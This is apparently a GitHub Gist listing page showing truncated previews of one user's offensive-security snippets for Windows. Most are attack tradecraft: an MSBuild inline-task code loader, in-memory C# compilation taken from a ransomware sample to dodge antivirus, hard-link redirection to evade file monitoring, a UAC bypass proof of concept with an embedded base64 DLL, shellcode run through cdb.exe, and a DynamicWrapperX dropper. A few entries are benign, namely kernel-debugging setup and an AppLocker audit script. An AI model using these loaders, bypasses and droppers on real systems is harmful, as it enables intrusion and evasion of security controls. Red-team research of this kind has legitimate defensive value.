Skip to content

Instantly share code, notes, and snippets.

caseysmithrc

Block or report user

Report or block caseysmithrc

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@caseysmithrc
caseysmithrc / JankyAF.csproj
Created Jul 17, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@caseysmithrc
caseysmithrc / CompileInMemory.cs
Created Jul 8, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this will still execute csc.exe and drop a dll to %temp% https://twitter.com/Laughing_Mantis/status/991018563296157696
View CompileInMemory.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
@caseysmithrc
caseysmithrc / Update_Notes.md
Last active Jul 22, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@caseysmithrc
caseysmithrc / UserWritableLocations.ps1
Created Jul 4, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
"C:\Windows"
)
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
@caseysmithrc
caseysmithrc / UAC-dotnet-profiler-poc.ps1
Created Jul 2, 2019 — forked from clavoillotte/UAC-dotnet-profiler-poc.ps1
PoC of UAC bypass with a .NET profiler DLL
View UAC-dotnet-profiler-poc.ps1
# Bypass UAC with a .NET profiler DLL
# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
$DllBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADXHurFk3+ElpN/hJaTf4SWsR+Fl5B/hJaTf4WWkX+EligejJeRf4SWKB6Gl5J/hJZSaWNok3+ElgAAAAAAAAAAUEUAAGSGAwAgMyBZAAAAAAAAAADwACIgCwIOCgACAAAABgAAAAAAAAAQAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAQAAAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA4CEAACgAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAACAgAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAA7AAAAABAAAAACAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARgIAAAAgAAAABAAAAAYAAAAAAAAAAAAAAAAAAEAAAEAucGRhdGEAAAwAAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@caseysmithrc
caseysmithrc / malicious.cs
Created Jun 15, 2019 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
View malicious.cs
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@caseysmithrc
caseysmithrc / win_vm_kerneldbg.md
Created Jun 7, 2019 — forked from cji/win_vm_kerneldbg.md
Steps to successfully debug the Windows kernel between 2 VMWare VMs
View win_vm_kerneldbg.md

Open the debugger VM's .vmx file. delete the existing serial0 lines (used for printing, not needed) add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
@caseysmithrc
caseysmithrc / sc-cdb.py
Created Jun 7, 2019 — forked from 3xocyte/sc-cdb.py
shellcode to cbd.exe
View sc-cdb.py
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
src = open('shellcode', 'r')
sc = src.read()
src.close
copy = ";eb @$t0+"
@caseysmithrc
caseysmithrc / dynwrapx.js
Created Jun 2, 2019
DynamicWrapperX Dropper - Code Registration Example
View dynwrapx.js
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac
You can’t perform that action at this time.